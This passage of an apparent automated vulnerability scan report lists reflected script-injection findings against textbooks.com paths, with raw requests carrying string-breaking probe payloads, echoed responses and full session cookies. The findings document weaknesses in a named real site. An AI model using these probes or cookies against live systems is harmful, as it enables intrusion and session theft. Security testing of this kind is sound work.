TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:08 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/browse.jscb610';f73ab7832ba'

</script>
...[SNIP]...

1.81. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78723'%3baff6123c54d was submitted in the REST URL parameter 1. This input was echoed as 78723';aff6123c54d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js78723'%3baff6123c54d/jquery-1.3.2.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:27:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js78723';aff6123c54d/jquery-1.3.2.js'

</script>
...[SNIP]...

1.82. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46788'%3b0db680dc9d7 was submitted in the REST URL parameter 2. This input was echoed as 46788';0db680dc9d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.3.2.js46788'%3b0db680dc9d7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/jquery-1.3.2.js46788';0db680dc9d7'

</script>
...[SNIP]...

1.83. https://www.textbooks.com/js/main.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1095'%3ba7cd64d56d2 was submitted in the REST URL parameter 1. This input was echoed as d1095';a7cd64d56d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsd1095'%3ba7cd64d56d2/main.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:27:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsd1095';a7cd64d56d2/main.js'

</script>
...[SNIP]...

1.84. https://www.textbooks.com/js/main.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2bd'%3b2d9b5e25c8f was submitted in the REST URL parameter 2. This input was echoed as 9f2bd';2d9b5e25c8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/main.js9f2bd'%3b2d9b5e25c8f HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:27:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/main.js9f2bd';2d9b5e25c8f'

</script>
...[SNIP]...

1.85. https://www.textbooks.com/js/php.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9857c'%3bee018a7187 was submitted in the REST URL parameter 1. This input was echoed as 9857c';ee018a7187 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js9857c'%3bee018a7187/php.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3624
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js9857c';ee018a7187/php.js'

</script>
...[SNIP]...

1.86. https://www.textbooks.com/js/php.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5032c'%3be9abaae6140 was submitted in the REST URL parameter 2. This input was echoed as 5032c';e9abaae6140 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/php.js5032c'%3be9abaae6140 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%